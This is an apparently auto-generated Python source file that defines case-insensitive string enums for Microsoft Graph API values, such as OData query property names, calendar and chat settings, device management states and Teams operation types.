class Get1ItemsItem(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Selectable property names (auto-generated; presumably OData $select values — confirm against the API spec)."""
    ID = "id"
    CREATED_BY = "createdBy"
    CREATED_DATE_TIME = "createdDateTime"
    DESCRIPTION = "description"
    E_TAG = "eTag"
    LAST_MODIFIED_BY = "lastModifiedBy"
    LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
    NAME = "name"
    PARENT_REFERENCE = "parentReference"
    WEB_URL = "webUrl"
    DISPLAY_NAME = "displayName"
    ERROR = "error"
    ROOT = "root"
    SHAREPOINT_IDS = "sharepointIds"
    SITE_COLLECTION = "siteCollection"
    CREATED_BY_USER = "createdByUser"
    LAST_MODIFIED_BY_USER = "lastModifiedByUser"
    ANALYTICS = "analytics"
    COLUMNS = "columns"
    CONTENT_TYPES = "contentTypes"
    DRIVE = "drive"
    DRIVES = "drives"
    ITEMS = "items"
    LISTS = "lists"
    SITES = "sites"
    ONENOTE = "onenote"
class Get2ItemsItem(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Selectable property names (auto-generated; presumably OData $select values — confirm against the API spec)."""
    ID = "id"
    CREATED_BY = "createdBy"
    CREATED_DATE_TIME = "createdDateTime"
    DESCRIPTION = "description"
    E_TAG = "eTag"
    LAST_MODIFIED_BY = "lastModifiedBy"
    LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
    NAME = "name"
    PARENT_REFERENCE = "parentReference"
    WEB_URL = "webUrl"
    DISPLAY_NAME = "displayName"
    ERROR = "error"
    ROOT = "root"
    SHAREPOINT_IDS = "sharepointIds"
    SITE_COLLECTION = "siteCollection"
    CREATED_BY_USER = "createdByUser"
    LAST_MODIFIED_BY_USER = "lastModifiedByUser"
    ANALYTICS = "analytics"
    COLUMNS = "columns"
    CONTENT_TYPES = "contentTypes"
    DRIVE = "drive"
    DRIVES = "drives"
    ITEMS = "items"
    LISTS = "lists"
    SITES = "sites"
    ONENOTE = "onenote"
class Get3ItemsItem(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """'*' or navigation-property names (auto-generated; presumably OData $expand values — confirm against the API spec)."""
    ASTERISK = "*"
    CREATED_BY_USER = "createdByUser"
    LAST_MODIFIED_BY_USER = "lastModifiedByUser"
    ANALYTICS = "analytics"
    COLUMNS = "columns"
    CONTENT_TYPES = "contentTypes"
    DRIVE = "drive"
    DRIVES = "drives"
    ITEMS = "items"
    LISTS = "lists"
    SITES = "sites"
    ONENOTE = "onenote"
class Get5ItemsItem(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Orderable property names and their ' desc' variants (auto-generated; presumably OData $orderby values — confirm against the API spec)."""
    ID = "id"
    ID_DESC = "id desc"
    CREATED_BY = "createdBy"
    CREATED_BY_DESC = "createdBy desc"
    CREATED_DATE_TIME = "createdDateTime"
    CREATED_DATE_TIME_DESC = "createdDateTime desc"
    DESCRIPTION = "description"
    DESCRIPTION_DESC = "description desc"
    E_TAG = "eTag"
    E_TAG_DESC = "eTag desc"
    LAST_MODIFIED_BY = "lastModifiedBy"
    LAST_MODIFIED_BY_DESC = "lastModifiedBy desc"
    LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
    LAST_MODIFIED_DATE_TIME_DESC = "lastModifiedDateTime desc"
    NAME = "name"
    NAME_DESC = "name desc"
    PARENT_REFERENCE = "parentReference"
    PARENT_REFERENCE_DESC = "parentReference desc"
    WEB_URL = "webUrl"
    WEB_URL_DESC = "webUrl desc"
    DISPLAY_NAME = "displayName"
    DISPLAY_NAME_DESC = "displayName desc"
    ERROR = "error"
    ERROR_DESC = "error desc"
    ROOT = "root"
    ROOT_DESC = "root desc"
    SHAREPOINT_IDS = "sharepointIds"
    SHAREPOINT_IDS_DESC = "sharepointIds desc"
    SITE_COLLECTION = "siteCollection"
    SITE_COLLECTION_DESC = "siteCollection desc"
class Get6ItemsItem(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Orderable property names and their ' desc' variants (auto-generated; presumably OData $orderby values — confirm against the API spec)."""
    ID = "id"
    ID_DESC = "id desc"
    CREATED_BY = "createdBy"
    CREATED_BY_DESC = "createdBy desc"
    CREATED_DATE_TIME = "createdDateTime"
    CREATED_DATE_TIME_DESC = "createdDateTime desc"
    DESCRIPTION = "description"
    DESCRIPTION_DESC = "description desc"
    E_TAG = "eTag"
    E_TAG_DESC = "eTag desc"
    LAST_MODIFIED_BY = "lastModifiedBy"
    LAST_MODIFIED_BY_DESC = "lastModifiedBy desc"
    LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
    LAST_MODIFIED_DATE_TIME_DESC = "lastModifiedDateTime desc"
    NAME = "name"
    NAME_DESC = "name desc"
    PARENT_REFERENCE = "parentReference"
    PARENT_REFERENCE_DESC = "parentReference desc"
    WEB_URL = "webUrl"
    WEB_URL_DESC = "webUrl desc"
    DISPLAY_NAME = "displayName"
    DISPLAY_NAME_DESC = "displayName desc"
    ERROR = "error"
    ERROR_DESC = "error desc"
    ROOT = "root"
    ROOT_DESC = "root desc"
    SHAREPOINT_IDS = "sharepointIds"
    SHAREPOINT_IDS_DESC = "sharepointIds desc"
    SITE_COLLECTION = "siteCollection"
    SITE_COLLECTION_DESC = "siteCollection desc"
class Get7ItemsItem(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Selectable property names (auto-generated; presumably OData $select values — confirm against the API spec)."""
    ID = "id"
    CREATED_BY = "createdBy"
    CREATED_DATE_TIME = "createdDateTime"
    DESCRIPTION = "description"
    E_TAG = "eTag"
    LAST_MODIFIED_BY = "lastModifiedBy"
    LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
    NAME = "name"
    PARENT_REFERENCE = "parentReference"
    WEB_URL = "webUrl"
    DISPLAY_NAME = "displayName"
    ERROR = "error"
    ROOT = "root"
    SHAREPOINT_IDS = "sharepointIds"
    SITE_COLLECTION = "siteCollection"
    CREATED_BY_USER = "createdByUser"
    LAST_MODIFIED_BY_USER = "lastModifiedByUser"
    ANALYTICS = "analytics"
    COLUMNS = "columns"
    CONTENT_TYPES = "contentTypes"
    DRIVE = "drive"
    DRIVES = "drives"
    ITEMS = "items"
    LISTS = "lists"
    SITES = "sites"
    ONENOTE = "onenote"
class Get8ItemsItem(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """'*' or navigation-property names (auto-generated; presumably OData $expand values — confirm against the API spec)."""
    ASTERISK = "*"
    CREATED_BY_USER = "createdByUser"
    LAST_MODIFIED_BY_USER = "lastModifiedByUser"
    ANALYTICS = "analytics"
    COLUMNS = "columns"
    CONTENT_TYPES = "contentTypes"
    DRIVE = "drive"
    DRIVES = "drives"
    ITEMS = "items"
    LISTS = "lists"
    SITES = "sites"
    ONENOTE = "onenote"
class MicrosoftGraphActionState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Action state values (case-insensitive string enum; auto-generated)."""
    NONE = "none"
    PENDING = "pending"
    CANCELED = "canceled"
    ACTIVE = "active"
    DONE = "done"
    FAILED = "failed"
    NOT_SUPPORTED = "notSupported"
class MicrosoftGraphAttendeeType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Meeting attendee types (case-insensitive string enum; auto-generated)."""
    REQUIRED = "required"
    OPTIONAL = "optional"
    RESOURCE = "resource"
class MicrosoftGraphAutomaticRepliesStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Automatic-replies status values (case-insensitive string enum; auto-generated)."""
    DISABLED = "disabled"
    ALWAYS_ENABLED = "alwaysEnabled"
    SCHEDULED = "scheduled"
class MicrosoftGraphBodyType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Body content formats, text or HTML (case-insensitive string enum; auto-generated)."""
    TEXT = "text"
    HTML = "html"
class MicrosoftGraphCalendarColor(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Calendar color presets (case-insensitive string enum; auto-generated)."""
    LIGHT_BLUE = "lightBlue"
    LIGHT_GREEN = "lightGreen"
    AUTO = "auto"
    LIGHT_ORANGE = "lightOrange"
    LIGHT_GRAY = "lightGray"
    LIGHT_YELLOW = "lightYellow"
    LIGHT_TEAL = "lightTeal"
    LIGHT_PINK = "lightPink"
    LIGHT_BROWN = "lightBrown"
    LIGHT_RED = "lightRed"
    MAX_COLOR = "maxColor"
class MicrosoftGraphCalendarRoleType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Calendar sharing role values (case-insensitive string enum; auto-generated)."""
    NONE = "none"
    FREE_BUSY_READ = "freeBusyRead"
    LIMITED_READ = "limitedRead"
    READ = "read"
    WRITE = "write"
    DELEGATE_WITHOUT_PRIVATE_EVENT_ACCESS = "delegateWithoutPrivateEventAccess"
    DELEGATE_WITH_PRIVATE_EVENT_ACCESS = "delegateWithPrivateEventAccess"
    CUSTOM = "custom"
class MicrosoftGraphCategoryColor(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Category color presets, preset0–preset24 or none (case-insensitive string enum; auto-generated)."""
    PRESET0 = "preset0"
    PRESET1 = "preset1"
    NONE = "none"
    PRESET2 = "preset2"
    PRESET3 = "preset3"
    PRESET4 = "preset4"
    PRESET5 = "preset5"
    PRESET6 = "preset6"
    PRESET7 = "preset7"
    PRESET8 = "preset8"
    PRESET9 = "preset9"
    PRESET10 = "preset10"
    PRESET11 = "preset11"
    PRESET12 = "preset12"
    PRESET13 = "preset13"
    PRESET14 = "preset14"
    PRESET15 = "preset15"
    PRESET16 = "preset16"
    PRESET17 = "preset17"
    PRESET18 = "preset18"
    PRESET19 = "preset19"
    PRESET20 = "preset20"
    PRESET21 = "preset21"
    PRESET22 = "preset22"
    PRESET23 = "preset23"
    PRESET24 = "preset24"
class MicrosoftGraphChannelMembershipType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Channel membership types (case-insensitive string enum; auto-generated)."""
    STANDARD = "standard"
    PRIVATE = "private"
    UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
class MicrosoftGraphChatMessageImportance(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Chat message importance levels (case-insensitive string enum; auto-generated)."""
    NORMAL = "normal"
    HIGH = "high"
    URGENT = "urgent"
    UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
class MicrosoftGraphChatMessagePolicyViolationDlpActionTypes(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """DLP action types for a policy-violating chat message (case-insensitive string enum; auto-generated)."""
    NONE = "none"
    NOTIFY_SENDER = "notifySender"
    BLOCK_ACCESS = "blockAccess"
    BLOCK_ACCESS_EXTERNAL = "blockAccessExternal"
class MicrosoftGraphChatMessagePolicyViolationUserActionTypes(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """User action types on a policy-violating chat message (case-insensitive string enum; auto-generated)."""
    NONE = "none"
    OVERRIDE = "override"
    REPORT_FALSE_POSITIVE = "reportFalsePositive"
class MicrosoftGraphChatMessagePolicyViolationVerdictDetailsTypes(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Verdict-detail/override options for a policy-violating chat message (case-insensitive string enum; auto-generated)."""
    NONE = "none"
    ALLOW_FALSE_POSITIVE_OVERRIDE = "allowFalsePositiveOverride"
    ALLOW_OVERRIDE_WITHOUT_JUSTIFICATION = "allowOverrideWithoutJustification"
    ALLOW_OVERRIDE_WITH_JUSTIFICATION = "allowOverrideWithJustification"
class MicrosoftGraphChatMessageType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Chat message kinds (case-insensitive string enum; auto-generated)."""
    MESSAGE = "message"
    CHAT_EVENT = "chatEvent"
    TYPING = "typing"
    UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
class MicrosoftGraphComplianceState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Compliance state values (case-insensitive string enum; auto-generated)."""
    UNKNOWN = "unknown"
    COMPLIANT = "compliant"
    NONCOMPLIANT = "noncompliant"
    CONFLICT = "conflict"
    ERROR = "error"
    IN_GRACE_PERIOD = "inGracePeriod"
    CONFIG_MANAGER = "configManager"
class MicrosoftGraphComplianceStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Compliance status values (case-insensitive string enum; auto-generated)."""
    UNKNOWN = "unknown"
    NOT_APPLICABLE = "notApplicable"
    COMPLIANT = "compliant"
    REMEDIATED = "remediated"
    NON_COMPLIANT = "nonCompliant"
    ERROR = "error"
    CONFLICT = "conflict"
    NOT_ASSIGNED = "notAssigned"
class MicrosoftGraphDayOfWeek(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Days of the week (case-insensitive string enum; auto-generated)."""
    SUNDAY = "sunday"
    MONDAY = "monday"
    TUESDAY = "tuesday"
    WEDNESDAY = "wednesday"
    THURSDAY = "thursday"
    FRIDAY = "friday"
    SATURDAY = "saturday"
class MicrosoftGraphDelegateMeetingMessageDeliveryOptions(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Delivery options for delegate meeting messages (case-insensitive string enum; auto-generated)."""
    SEND_TO_DELEGATE_AND_INFORMATION_TO_PRINCIPAL = "sendToDelegateAndInformationToPrincipal"
    SEND_TO_DELEGATE_AND_PRINCIPAL = "sendToDelegateAndPrincipal"
    SEND_TO_DELEGATE_ONLY = "sendToDelegateOnly"
class MicrosoftGraphDeviceEnrollmentType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Device enrollment types (case-insensitive string enum; auto-generated)."""
    UNKNOWN = "unknown"
    USER_ENROLLMENT = "userEnrollment"
    DEVICE_ENROLLMENT_MANAGER = "deviceEnrollmentManager"
    APPLE_BULK_WITH_USER = "appleBulkWithUser"
    APPLE_BULK_WITHOUT_USER = "appleBulkWithoutUser"
    WINDOWS_AZURE_AD_JOIN = "windowsAzureADJoin"
    WINDOWS_BULK_USERLESS = "windowsBulkUserless"
    WINDOWS_AUTO_ENROLLMENT = "windowsAutoEnrollment"
    WINDOWS_BULK_AZURE_DOMAIN_JOIN = "windowsBulkAzureDomainJoin"
    WINDOWS_CO_MANAGEMENT = "windowsCoManagement"
class MicrosoftGraphDeviceManagementExchangeAccessState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Exchange access states (case-insensitive string enum; auto-generated)."""
    NONE = "none"
    UNKNOWN = "unknown"
    ALLOWED = "allowed"
    BLOCKED = "blocked"
    QUARANTINED = "quarantined"
class MicrosoftGraphDeviceManagementExchangeAccessStateReason(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Reasons for an Exchange access state (case-insensitive string enum; auto-generated)."""
    NONE = "none"
    UNKNOWN = "unknown"
    EXCHANGE_GLOBAL_RULE = "exchangeGlobalRule"
    EXCHANGE_INDIVIDUAL_RULE = "exchangeIndividualRule"
    EXCHANGE_DEVICE_RULE = "exchangeDeviceRule"
    EXCHANGE_UPGRADE = "exchangeUpgrade"
    EXCHANGE_MAILBOX_POLICY = "exchangeMailboxPolicy"
    OTHER = "other"
    COMPLIANT = "compliant"
    NOT_COMPLIANT = "notCompliant"
    NOT_ENROLLED = "notEnrolled"
    UNKNOWN_LOCATION = "unknownLocation"
    MFA_REQUIRED = "mfaRequired"
    AZURE_AD_BLOCK_DUE_TO_ACCESS_POLICY = "azureADBlockDueToAccessPolicy"
    COMPROMISED_PASSWORD = "compromisedPassword"
    DEVICE_NOT_KNOWN_WITH_MANAGED_APP = "deviceNotKnownWithManagedApp"
class MicrosoftGraphDeviceRegistrationState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Device registration states (case-insensitive string enum; auto-generated)."""
    NOT_REGISTERED = "notRegistered"
    REGISTERED = "registered"
    REVOKED = "revoked"
    KEY_CONFLICT = "keyConflict"
    APPROVAL_PENDING = "approvalPending"
    CERTIFICATE_RESET = "certificateReset"
    NOT_REGISTERED_PENDING_ENROLLMENT = "notRegisteredPendingEnrollment"
    UNKNOWN = "unknown"
class MicrosoftGraphEventType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Calendar event kinds (case-insensitive string enum; auto-generated)."""
    SINGLE_INSTANCE = "singleInstance"
    OCCURRENCE = "occurrence"
    EXCEPTION = "exception"
    SERIES_MASTER = "seriesMaster"
class MicrosoftGraphExternalAudienceScope(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """External audience scopes (case-insensitive string enum; auto-generated)."""
    NONE = "none"
    CONTACTS_ONLY = "contactsOnly"
    ALL = "all"
class MicrosoftGraphFollowupFlagStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Follow-up flag statuses (case-insensitive string enum; auto-generated)."""
    NOT_FLAGGED = "notFlagged"
    COMPLETE = "complete"
    FLAGGED = "flagged"
class MicrosoftGraphFreeBusyStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Free/busy statuses (case-insensitive string enum; auto-generated)."""
    FREE = "free"
    TENTATIVE = "tentative"
    UNKNOWN = "unknown"
    BUSY = "busy"
    OOF = "oof"
    WORKING_ELSEWHERE = "workingElsewhere"
class MicrosoftGraphGiphyRatingType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Giphy content rating levels (case-insensitive string enum; auto-generated)."""
    STRICT = "strict"
    MODERATE = "moderate"
    UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
class MicrosoftGraphImportance(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Importance levels (case-insensitive string enum; auto-generated)."""
    LOW = "low"
    NORMAL = "normal"
    HIGH = "high"
class MicrosoftGraphInferenceClassificationType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Inference classification values, focused or other (case-insensitive string enum; auto-generated)."""
    FOCUSED = "focused"
    OTHER = "other"
class MicrosoftGraphLocationType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Location kinds (case-insensitive string enum; auto-generated)."""
    DEFAULT = "default"
    CONFERENCE_ROOM = "conferenceRoom"
    HOME_ADDRESS = "homeAddress"
    BUSINESS_ADDRESS = "businessAddress"
    GEO_COORDINATES = "geoCoordinates"
    STREET_ADDRESS = "streetAddress"
    HOTEL = "hotel"
    RESTAURANT = "restaurant"
    LOCAL_BUSINESS = "localBusiness"
    POSTAL_ADDRESS = "postalAddress"
class MicrosoftGraphLocationUniqueIdType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Sources of a location's unique identifier (case-insensitive string enum; auto-generated)."""
    UNKNOWN = "unknown"
    LOCATION_STORE = "locationStore"
    DIRECTORY = "directory"
    PRIVATE = "private"
    BING = "bing"
class MicrosoftGraphManagedAppFlaggedReason(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Reasons a managed app is flagged (case-insensitive string enum; auto-generated)."""
    NONE = "none"
    ROOTED_DEVICE = "rootedDevice"
class MicrosoftGraphManagedDeviceOwnerType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Managed device ownership types (case-insensitive string enum; auto-generated)."""
    UNKNOWN = "unknown"
    COMPANY = "company"
    PERSONAL = "personal"
class MicrosoftGraphManagedDevicePartnerReportedHealthState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Partner-reported device health states (case-insensitive string enum; auto-generated)."""
    UNKNOWN = "unknown"
    ACTIVATED = "activated"
    DEACTIVATED = "deactivated"
    SECURED = "secured"
    LOW_SEVERITY = "lowSeverity"
    MEDIUM_SEVERITY = "mediumSeverity"
    HIGH_SEVERITY = "highSeverity"
    UNRESPONSIVE = "unresponsive"
    COMPROMISED = "compromised"
    MISCONFIGURED = "misconfigured"
class MicrosoftGraphManagementAgentType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Management agent types (case-insensitive string enum; auto-generated)."""
    EAS = "eas"
    MDM = "mdm"
    EAS_MDM = "easMdm"
    INTUNE_CLIENT = "intuneClient"
    EAS_INTUNE_CLIENT = "easIntuneClient"
    CONFIGURATION_MANAGER_CLIENT = "configurationManagerClient"
    CONFIGURATION_MANAGER_CLIENT_MDM = "configurationManagerClientMdm"
    CONFIGURATION_MANAGER_CLIENT_MDM_EAS = "configurationManagerClientMdmEas"
    UNKNOWN = "unknown"
    JAMF = "jamf"
    GOOGLE_CLOUD_DEVICE_POLICY_CONTROLLER = "googleCloudDevicePolicyController"
class MicrosoftGraphMessageActionFlag(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Message action flags (case-insensitive string enum; auto-generated)."""
    ANY = "any"
    CALL = "call"
    DO_NOT_FORWARD = "doNotForward"
    FOLLOW_UP = "followUp"
    FYI = "fyi"
    FORWARD = "forward"
    NO_RESPONSE_NECESSARY = "noResponseNecessary"
    READ = "read"
    REPLY = "reply"
    REPLY_TO_ALL = "replyToAll"
    REVIEW = "review"
class MicrosoftGraphOnenotePatchActionType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """OneNote PATCH action types; note the values are capitalized in this API (case-insensitive string enum; auto-generated)."""
    REPLACE = "Replace"
    APPEND = "Append"
    DELETE = "Delete"
    INSERT = "Insert"
    PREPEND = "Prepend"
class MicrosoftGraphOnenotePatchInsertPosition(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Insert positions for a OneNote PATCH, After or Before (case-insensitive string enum; auto-generated)."""
    AFTER = "After"
    BEFORE = "Before"
class MicrosoftGraphOnenoteSourceService(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """OneNote source services (case-insensitive string enum; auto-generated)."""
    UNKNOWN = "Unknown"
    ONE_DRIVE = "OneDrive"
    ONE_DRIVE_FOR_BUSINESS = "OneDriveForBusiness"
    ON_PREM_ONE_DRIVE_FOR_BUSINESS = "OnPremOneDriveForBusiness"
class MicrosoftGraphOnenoteUserRole(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """OneNote user roles (case-insensitive string enum; auto-generated)."""
    OWNER = "Owner"
    CONTRIBUTOR = "Contributor"
    NONE = "None"
    READER = "Reader"
class MicrosoftGraphOnlineMeetingProviderType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Online meeting provider types (case-insensitive string enum; auto-generated)."""
    UNKNOWN = "unknown"
    SKYPE_FOR_BUSINESS = "skypeForBusiness"
    SKYPE_FOR_CONSUMER = "skypeForConsumer"
    TEAMS_FOR_BUSINESS = "teamsForBusiness"
class MicrosoftGraphOperationStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Operation statuses (case-insensitive string enum; auto-generated)."""
    NOT_STARTED = "NotStarted"
    RUNNING = "Running"
    COMPLETED = "Completed"
    FAILED = "Failed"
class MicrosoftGraphPhoneType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Phone number kinds (case-insensitive string enum; auto-generated)."""
    HOME = "home"
    BUSINESS = "business"
    MOBILE = "mobile"
    OTHER = "other"
    ASSISTANT = "assistant"
    HOME_FAX = "homeFax"
    BUSINESS_FAX = "businessFax"
    OTHER_FAX = "otherFax"
    PAGER = "pager"
    RADIO = "radio"
class MicrosoftGraphPlannerPreviewType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Planner task preview types (case-insensitive string enum; auto-generated)."""
    AUTOMATIC = "automatic"
    NO_PREVIEW = "noPreview"
    CHECKLIST = "checklist"
    DESCRIPTION = "description"
    REFERENCE = "reference"
class MicrosoftGraphPolicyPlatformType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Policy platform types (case-insensitive string enum; auto-generated)."""
    ANDROID = "android"
    I_OS = "iOS"
    MAC_OS = "macOS"
    WINDOWS_PHONE81 = "windowsPhone81"
    WINDOWS81_AND_LATER = "windows81AndLater"
    WINDOWS10_AND_LATER = "windows10AndLater"
    ANDROID_WORK_PROFILE = "androidWorkProfile"
    ALL = "all"
class MicrosoftGraphRecurrencePatternType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Recurrence pattern types (case-insensitive string enum; auto-generated)."""
    DAILY = "daily"
    WEEKLY = "weekly"
    ABSOLUTE_MONTHLY = "absoluteMonthly"
    RELATIVE_MONTHLY = "relativeMonthly"
    ABSOLUTE_YEARLY = "absoluteYearly"
    RELATIVE_YEARLY = "relativeYearly"
class MicrosoftGraphRecurrenceRangeType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Recurrence range types (case-insensitive string enum; auto-generated)."""
    END_DATE = "endDate"
    NO_END = "noEnd"
    NUMBERED = "numbered"
class MicrosoftGraphResponseType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Meeting response types (case-insensitive string enum; auto-generated)."""
    NONE = "none"
    ORGANIZER = "organizer"
    TENTATIVELY_ACCEPTED = "tentativelyAccepted"
    ACCEPTED = "accepted"
    DECLINED = "declined"
    NOT_RESPONDED = "notResponded"
class MicrosoftGraphScheduleChangeRequestActor(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Actors in a schedule-change request (case-insensitive string enum; auto-generated)."""
    SENDER = "sender"
    RECIPIENT = "recipient"
    MANAGER = "manager"
    SYSTEM = "system"
    UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
class MicrosoftGraphScheduleChangeState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Schedule-change request states (case-insensitive string enum; auto-generated)."""
    PENDING = "pending"
    APPROVED = "approved"
    DECLINED = "declined"
    UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
class MicrosoftGraphScheduleEntityTheme(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Schedule entity color themes (case-insensitive string enum; auto-generated)."""
    WHITE = "white"
    BLUE = "blue"
    GREEN = "green"
    PURPLE = "purple"
    PINK = "pink"
    YELLOW = "yellow"
    GRAY = "gray"
    DARK_BLUE = "darkBlue"
    DARK_GREEN = "darkGreen"
    DARK_PURPLE = "darkPurple"
    DARK_PINK = "darkPink"
    DARK_YELLOW = "darkYellow"
    UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
class MicrosoftGraphSelectionLikelihoodInfo(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Selection likelihood values (case-insensitive string enum; auto-generated)."""
    NOT_SPECIFIED = "notSpecified"
    HIGH = "high"
class MicrosoftGraphSensitivity(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Item sensitivity levels (case-insensitive string enum; auto-generated)."""
    NORMAL = "normal"
    PERSONAL = "personal"
    PRIVATE = "private"
    CONFIDENTIAL = "confidential"
class MicrosoftGraphStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Generic item statuses (case-insensitive string enum; auto-generated)."""
    ACTIVE = "active"
    UPDATED = "updated"
    DELETED = "deleted"
    IGNORED = "ignored"
    UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
class MicrosoftGraphTeamsAppDistributionMethod(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Teams app distribution methods (case-insensitive string enum; auto-generated)."""
    STORE = "store"
    ORGANIZATION = "organization"
    SIDELOADED = "sideloaded"
    UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
class MicrosoftGraphTeamsAsyncOperationStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Teams async operation statuses (case-insensitive string enum; auto-generated)."""
    INVALID = "invalid"
    NOT_STARTED = "notStarted"
    IN_PROGRESS = "inProgress"
    SUCCEEDED = "succeeded"
    FAILED = "failed"
    UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
class MicrosoftGraphTeamsAsyncOperationType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Teams async operation types (case-insensitive string enum; auto-generated)."""
    INVALID = "invalid"
    CLONE_TEAM = "cloneTeam"
    ARCHIVE_TEAM = "archiveTeam"
    UNARCHIVE_TEAM = "unarchiveTeam"
    CREATE_TEAM = "createTeam"
    UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
class MicrosoftGraphTeamSpecialization(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Team specialization types (case-insensitive string enum; auto-generated)."""
    NONE = "none"
    EDUCATION_STANDARD = "educationStandard"
    EDUCATION_CLASS = "educationClass"
    EDUCATION_PROFESSIONAL_LEARNING_COMMUNITY = "educationProfessionalLearningCommunity"
    EDUCATION_STAFF = "educationStaff"
    HEALTHCARE_STANDARD = "healthcareStandard"
    HEALTHCARE_CARE_COORDINATION = "healthcareCareCoordination"
    UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
class MicrosoftGraphTeamVisibilityType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Team visibility types (case-insensitive string enum; auto-generated)."""
    PRIVATE = "private"
    PUBLIC = "public"
    HIDDEN_MEMBERSHIP = "hiddenMembership"
    UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
class MicrosoftGraphTimeOffReasonIconType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Icon types for a time-off reason (case-insensitive string enum; auto-generated)."""
    NONE = "none"
    CAR = "car"
    CALENDAR = "calendar"
    RUNNING = "running"
    PLANE = "plane"
    FIRST_AID = "firstAid"
    DOCTOR = "doctor"
    NOT_WORKING = "notWorking"
    CLOCK = "clock"
    JURY_DUTY = "juryDuty"
    GLOBE = "globe"
    CUP = "cup"
    PHONE = "phone"
    WEATHER = "weather"
    UMBRELLA = "umbrella"
    PIGGY_BANK = "piggyBank"
    DOG = "dog"
    CAKE = "cake"
    TRAFFIC_CONE = "trafficCone"
    PIN = "pin"
    SUNNY = "sunny"
    UNKNOWN_FUTURE_VALUE = "unknownFutureValue"
